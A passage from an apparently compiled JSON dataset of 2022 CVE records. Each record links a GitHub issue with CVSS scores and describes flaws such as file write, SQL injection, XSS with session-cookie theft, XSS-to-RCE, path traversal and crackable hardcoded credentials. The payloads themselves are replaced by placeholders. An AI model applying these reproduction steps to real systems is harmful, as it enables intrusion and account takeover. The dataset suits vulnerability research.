        "description": "There is an arbitrary file writing vulnerability in the HYBBS production plug in function. There is an arbitrary file writing vulnerability in the HYBBS production plug in function Vulnerability overview There is an arbitrary file writing vulnerability in the HYBBS management background making plugin function, which leads to the server permission being obtained. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Fill in APITAG in the plugin description, and click the OK button. FILETAG Then it will prompt that the plugin was created successfully FILETAG From the folder monitoring software log, you can see that the program created the malicious file FILETAG FILETAG FILETAG Vulnerability code analysis Locate the code that makes the plug in function FILETAG It can be seen that the program directly writes the plugin related configuration information to FILETAG without any security filtering, resulting in an arbitrary file writing vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24721",
        "Issue_Url_old": "https://github.com/cometd/cometd/issues/1146",
        "Issue_Url_new": "https://github.com/cometd/cometd/issues/1146",
        "Repo_new": "cometd/cometd",
        "Issue_Created_At": "2022-02-22T16:39:08Z",
        "description": "Review APITAG channel usage. APITAG version(s NUMBERTAG Description Review usage of channels used by APITAG (e.g. Oort and Seti ).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24725",
        "Issue_Url_old": "https://github.com/ericcornelissen/shescape/issues/169",
        "Issue_Url_new": "https://github.com/ericcornelissen/shescape/issues/169",
        "Repo_new": "ericcornelissen/shescape",
        "Issue_Created_At": "2022-02-19T18:00:52Z",
        "description": "Trailing string APITAG in Bash not escaped properly by APITAG Bug Report Shescape version : APITAG =~ APITAG ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~` should be escaped to avoid it being expanded when the argument is used. Working Example This bug was found by fuzzing, the crash result can be found here: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24726",
        "Issue_Url_old": "https://github.com/golang/go/issues/51112",
        "Issue_Url_new": "https://github.com/golang/go/issues/51112",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2022-02-09T20:13:46Z",
        "description": "regexp: stack overflow (process exit) handling deeply nested regexp. On NUMBERTAG bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, APITAG APITAG NUMBERTAG is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of accepted expressions. A max depth of NUMBERTAG did not break any of our tests. (A max depth of NUMBERTAG did break one library that was mechanically generating a truly awful regular expression.) To fix the problem I intend to cap the maximum depth of a regexp accepted by APITAG at NUMBERTAG what is needed by Google C++ and really about NUMBERTAG what is reasonable. Depth means the depth of the parse tree: APITAG has depth NUMBERTAG as does APITAG in POSIX mode. (In Perl mode that's a syntax error.) This will need to be backported to Go NUMBERTAG and Go NUMBERTAG as well.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24739",
        "Issue_Url_old": "https://github.com/ytdl-org/youtube-dl/issues/30691",
        "Issue_Url_new": "https://github.com/ytdl-org/youtube-dl/issues/30691",
        "Repo_new": "ytdl-org/youtube-dl",
        "Issue_Created_At": "2022-02-27T11:53:30Z",
        "description": "Add a way to not follow redirects. APITAG Checklist APITAG [x] I'm reporting a feature request [x] I've verified that I'm running youtube dl version APITAG [x] I've searched the bugtracker for similar feature requests including closed ones Description APITAG The generic extractor currently follows redirects blindly. This is not an issue when running youtube dl locally, however when it is used in a web app this can allow an attacker to run a SSRF attack. Even if the web app does not allow calling youtube dl on internal URLs, an attacker could still craft an external URL redirecting to an internal resource. Because of this, apps sending requests to arbitrary external URLs [should disable redirects in the HTTP client URLTAG but youtube dl provides no easy way to do this. I see two solutions to this: Add a way to disable the generic extractor Add a flag that would make this extractor not follow redirects",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24762",
        "Issue_Url_old": "https://github.com/jcubic/sysend.js/issues/33",
        "Issue_Url_new": "https://github.com/jcubic/sysend.js/issues/33",
        "Repo_new": "jcubic/sysend.js",
        "Issue_Created_At": "2022-03-13T12:52:34Z",
        "description": "Leaking of potential sensitive user information on Cross Domain communication. If users use cross domain communication, attackers can create an iframe and listen to any messages sent from the app and also send messages to the app. This happens only in the same browser so this is low impact. Example exploit, if you upload this file to any domain, you can intercept messages from FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24778",
        "Issue_Url_old": "https://github.com/containerd/imgcrypt/issues/69",
        "Issue_Url_new": "https://github.com/containerd/imgcrypt/issues/69",
        "Repo_new": "containerd/imgcrypt",
        "Issue_Created_At": "2022-03-15T16:36:15Z",
        "description": "APITAG not working for multi arch images. When a multi arch index descriptor is provided to the imgcrypt's APITAG func (e.g. via APITAG the library iterates over the manifests it refers to with the APITAG option set to true to perform a check only. That causes the cycle to stop on the first manifest in the collection as the condition here URLTAG will always be evaluated to true error regardless. Additionally, if reading any of the referred manifest's children returns an APITAG URLTAG , the cycle will exit with a nil error, thus, the authorization check passes incorrectly. Let's take for example the case where the cycle checks the first manifest in the collection (e.g. for amd NUMBERTAG on an arm/arm NUMBERTAG machine, the children of this manifest are not found since this is not the target platform and they are not pulled > the authorization check passes incorrectly. This issue is rarely reproducible on an amd NUMBERTAG machine as usually, this is the first manifest in the index descriptor.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24815",
        "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/18269",
        "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/18269",
        "Repo_new": "jhipster/generator-jhipster",
        "Issue_Created_At": "2022-04-03T23:08:46Z",
        "description": "SQL Injection in Reactive project. I don't know whether this is the right place to ask this though... In a reactive spring project with r2dbc, I found that SQL injection is actually possible. This may happen because of me, lacking knowledge on how to use r2dbc correctly. If it is case please let me know the correct usage. Setup Jhipster NUMBERTAG reactive with Spring APITAG Yes type of database? SQL JDL APITAG Change I made Make /api/ be accessible without authorization header Make GET /api/examples accept query parameter of name , and bind the parameter to the APITAG repository method Make a request to APITAG Result The sql rendered was APITAG That actually dropped the table APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-24837",
        "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/808",
        "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/808",
        "Repo_new": "node-formidable/formidable",
        "Issue_Created_At": "2022-01-02T21:39:54Z",
        "description": "uniq filenames. Whenever i encounter a \"need to generate a uniq filename\" and including dependencies and so forth like hexoid to generate them URLTAG and seeing stuff like: URLTAG Then i might sometimes link to this article: URLTAG APITAG URLTAG is suppose to help you with this... how about instead generate one uniq dir with mkdtemp and simple use the filename n NUMBERTAG instead (without extension)? APITAG my proposal: remove hexoid",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24843",
        "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
        "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
        "Repo_new": "flipped-aurora/gin-vue-admin",
        "Issue_Created_At": "2022-04-02T07:25:03Z",
        "description": "APITAG Security Issues NUMBERTAG luckyt0mat0. gin vue admin NUMBERTAG b Node NUMBERTAG Golang \u7248\u672c APITAG \u662f\u5426\u4f9d\u65e7\u5b58\u5728 \u53ef\u4ee5 bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6/\u4e0b\u8f7d\u5b89\u5168\u6f0f\u6d1e\uff0cwx\u8054\u7cfb~ \u4fee\u6539\u5efa\u8bae \u53c2\u6570\u6821\u9a8c\u4e0b\u5373\u53ef\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24851",
        "Issue_Url_old": "https://github.com/LDAPAccountManager/lam/issues/170",
        "Issue_Url_new": "https://github.com/ldapaccountmanager/lam/issues/170",
        "Repo_new": "ldapaccountmanager/lam",
        "Issue_Created_At": "2022-04-10T18:07:59Z",
        "description": "Multiple vulnerabilities in LDAP Account Manager. Hello.. I am a security researcher, and with my friend Manthan( APITAG We reviewed the application and discovered multiple vulnerabilities NUMBERTAG Stored XSS Description The profile editor tool has an edit profile functionality, the parameters on this page are not properly sanitized and hence leads to stored XSS attacks. An authenticated user can store XSS payloads in the profiles, which gets triggered when any other user try to access the edit profile page. Impact APITAG (depends on how the server profile is configured.. if ldap users and ldap admin both can login to ldap account manager, an ldap user can write save xss payloads to trigger tasks as admin) Affected URL FILETAG POC : As an authenticated user navigate to the URL FILETAG FILETAG Create a new user profile for either user or group (editing profile will also work) and in description field add the XSS payload APITAG and save the profile. FILETAG Now whenever any authenticated user will edit this profile page, XSS payload will be triggered. FILETAG FILETAG NUMBERTAG Arbitrary jpg/png file read Description The pdf editor tool has an edit pdf profile functionality, the APITAG parameter in it is not properly sanitized and an user can enter relative paths like APITAG via tools like burpsuite. Later when a pdf is exported using the edited profile the pdf icon has the image on that path(if image is present). Impact Low APITAG is low, due to highly unlikelihood of ldap admin knowing the locations of images having any APITAG information. One possible attack vector is to enumerate tools/software on the system by checking for icon images.. like in this POC we can verify the server has vim installed) Affected URL FILETAG POC : As an authenticated user navigate to the URL FILETAG FILETAG Create a new pdf structure for either user or group (editing profile will also work) FILETAG With burpsuite proxy on, click on save. In burpsuite, replace the value of APITAG parameter to the path of image file, lets say APITAG for the icon file of vim and forward the request. FILETAG Now while exporting pdf for a user if that POC profile is selected, the exported pdf will have the vim logo image. FILETAG FILETAG We would have loved to fix these ourselves.... but _cries bcz of bad dev skills_.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-24881",
        "Issue_Url_old": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
        "Issue_Url_new": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
        "Repo_new": "ballcat-projects/ballcat-codegen",
        "Issue_Created_At": "2022-04-25T07:01:20Z",
        "description": "ballcat codegen template engine injection RCE. \u5df2\u4f7f\u7528wx\u8054\u7cfb~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24890",
        "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/7048",
        "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/7048",
        "Repo_new": "nextcloud/spreed",
        "Issue_Created_At": "2022-03-24T08:52:02Z",
        "description": "Connection can not be established without camera permission. How to use APITAG Please use the \ud83d\udc4d reaction URLTAG to show that you are affected by the same issue. Please don't comment if you have no relevant information to add. It's just extra noise for everyone subscribed to this issue. Subscribe to receive notifications on status change and new comments. Steps to reproduce NUMBERTAG As user A create a room with group NUMBERTAG where user B is a member of NUMBERTAG As user A set custom permissions for user B only change to remove the camera permission NUMBERTAG As user A start a call NUMBERTAG As user B try to join the call Expected behaviour User B can join and talk Actual behaviour User B is disconnecting and connecting all the time Talk app Talk app version: master Custom Signaling server configured: no Custom TURN server configured: no Custom STUN server configured: no Browser Microphone available: yes using fake stream Camera available: yes using fake stream Operating system: Ubuntu Browser name: Firefox Browser version NUMBERTAG Browser log FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24900",
        "Issue_Url_old": "https://github.com/onlaj/Piano-LED-Visualizer/issues/350",
        "Issue_Url_new": "https://github.com/onlaj/piano-led-visualizer/issues/350",
        "Repo_new": "onlaj/piano-led-visualizer",
        "Issue_Created_At": "2022-04-28T20:25:57Z",
        "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the value parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. References OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24902",
        "Issue_Url_old": "https://github.com/PaulleDemon/tkVideoPlayer/issues/3",
        "Issue_Url_new": "https://github.com/paulledemon/tkvideoplayer/issues/3",
        "Repo_new": "paulledemon/tkvideoplayer",
        "Issue_Created_At": "2022-04-29T17:24:07Z",
        "description": "Huge memory usage even on small files.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24961",
        "Issue_Url_old": "https://github.com/portainer/portainer/issues/6420",
        "Issue_Url_new": "https://github.com/portainer/portainer/issues/6420",
        "Repo_new": "portainer/portainer",
        "Issue_Created_At": "2022-01-19T03:36:29Z",
        "description": "Added behavior for Edge agents to reject connections if not connected to within NUMBERTAG hrs. If an agent is running for more than NUMBERTAG days, and is not associated with a Portainer instance by then, it should start rejecting any incoming connections. This mechanism does not apply when using agent secret. [EE NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25013",
        "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/284",
        "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/284",
        "Repo_new": "gamonoid/icehrm",
        "Issue_Created_At": "2021-12-23T08:13:20Z",
        "description": "Reflected XSS vulnerabilities NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description DOM XSS in FILETAG GET parameter key . The input to key GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM. Proof of Concept Occurrence NUMBERTAG Request param key Request: CODETAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Occurence NUMBERTAG Request param fm The payload passed fm gets sanitized by PHP code. This could be bypassed by adding an extra GET param content with the value HTML . Thus backend will not sanitize any user input. ERRORTAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Impact This vulnerability is capable of script execution on the victim's browser. Cookies cannot be stealed since the user needs to be logged out for this page/attack to work. References URLTAG URLTAG Occurrences NUMBERTAG HTML sanitization can be bypassed with an extra APITAG GET param URLTAG URLTAG NUMBERTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25014",
        "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/283",
        "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/283",
        "Repo_new": "gamonoid/icehrm",
        "Issue_Created_At": "2021-12-23T08:09:18Z",
        "description": "Reflected XSS vulnerability NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description The input sent to GET parameter m gets reflected in a script generated in the page, and isn't sanitized properly, leading to a Reflected XSS vulnerability. You can try adding the payload APITAG into the URL bar for m parameter, in any of the pages in APITAG post login to see this in action. The server is taking in the content of parameter 'm', and generates the following script in the response enclosed within APITAG tags : ERRORTAG The APITAG parameter has the value passed in through m , which is unsanitized & gets reflected in the page. Proof of Concept NUMBERTAG login to the demo dashboard at FILETAG NUMBERTAG Follow the link : URLTAG URLTAG Impact A malicious actor can craft a link that when clicked by any user logged in (admin or normal user) can cause a Reflected XSS attack. This could lead to the leak of session credentials. Occurences URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25015",
        "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/285",
        "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/285",
        "Repo_new": "gamonoid/icehrm",
        "Issue_Created_At": "2021-12-23T08:15:18Z",
        "description": "Stored XSS vulnerability in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description APITAG website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require. As an example, here we will demonstrate Proof of Concept NUMBERTAG Login as any user into the dashboard NUMBERTAG Send the following payload, meant for updating the 'first name' of the logged in user. You'll have to replace the PHPSESSID , with the session ID of any valid logged in (less privileged) user . ERRORTAG NUMBERTAG Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed APITAG > Users' . You'll be able to see the alert box with session cookie of 'admin' user. The extra added APITAG request parameter causes the backend to ignore sanitization of user input. Impact A less privileged user can take over 'admin' account by stealing the session cookie. Occurrences URLTAG URLTAG User input sanitization is not done if the 'content' parameter is set to 'HTML'",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25023",
        "Issue_Url_old": "https://github.com/adamstark/AudioFile/issues/58",
        "Issue_Url_new": "https://github.com/adamstark/audiofile/issues/58",
        "Repo_new": "adamstark/audiofile",
        "Issue_Created_At": "2022-02-08T12:21:52Z",
        "description": "Bug]heap buffer overflow in function APITAG Description A heap buffer overflow was discovered in function APITAG The issue is being triggered in function APITAG Version Version NUMBERTAG d URLTAG APITAG commit) Environment Ubuntu NUMBERTAG bit Reproduce Command APITAG program ERRORTAG POC file at the bottom of this report. ASAN Report FILETAG FILETAG POC POC URLTAG Any issue plz contact with me: EMAILTAG OR: twitter: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25044",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2142",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/2142",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2022-02-08T12:58:50Z",
        "description": "stack buffer overflow APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25045",
        "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/6",
        "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/6",
        "Repo_new": "vivekpanday12/cve-",
        "Issue_Created_At": "2022-02-09T09:00:10Z",
        "description": "Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: VIVEK PANDAY Vendor Homepage: FILETAG Software Link: FILETAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25050",
        "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/1960",
        "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/1960",
        "Repo_new": "merbanan/rtl_433",
        "Issue_Created_At": "2022-01-24T12:23:29Z",
        "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25069",
        "Issue_Url_old": "https://github.com/marktext/marktext/issues/2990",
        "Issue_Url_new": "https://github.com/marktext/marktext/issues/2990",
        "Repo_new": "marktext/marktext",
        "Issue_Created_At": "2022-02-07T17:22:39Z",
        "description": "Security issue: DOM based XSS & RCE from pasting vulnerable HTML. APITAG Description An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS. ERRORTAG The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script. URLTAG APITAG [x] Can you reproduce the issue? APITAG Steps to reproduce APITAG NUMBERTAG Copy the vulnerable HTML code ERRORTAG NUMBERTAG Paste it into Mark Text app Expected behavior: APITAG HTML should be sanitized before pasted into DOM. Actual behavior: APITAG No HTML sanitize procedure. Only checks if it's wrapped with APITAG or not. Link to an example: [optional] FILETAG FILETAG APITAG Versions APITAG version: APITAG Operating system: Windows NUMBERTAG APITAG Kali Linux APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25104",
        "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/43",
        "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/43",
        "Repo_new": "ttimot24/horizontcms",
        "Issue_Created_At": "2022-02-13T12:28:51Z",
        "description": "Arbitrary file download vulnerability. APITAG NUMBERTAG beta APITAG updated on NUMBERTAG Submit date NUMBERTAG APITAG file download vulnerability FILETAG POC\uff1a APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25139",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/451",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/451",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2021-12-24T06:48:19Z",
        "description": "Heap UAF in njs_await_fulfilled. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25220",
        "Issue_Url_old": "https://github.com/1modm/petereport/issues/35",
        "Issue_Url_new": "https://github.com/1modm/petereport/issues/35",
        "Repo_new": "1modm/petereport",
        "Issue_Created_At": "2022-02-07T20:21:47Z",
        "description": "Security Issue Stored XSS (markdown). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code inside the markdown descriptions while creating a product, report or finding. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Click on APITAG Product NUMBERTAG Insert the following APITAG inside the product description. APITAG NUMBERTAG Click on APITAG Product NUMBERTAG If a user visits the product and click on the link in the description the Javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-25229",
        "Issue_Url_old": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
        "Issue_Url_new": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
        "Repo_new": "popcorn-official/popcorn-desktop",
        "Issue_Created_At": "2022-04-26T20:46:04Z",
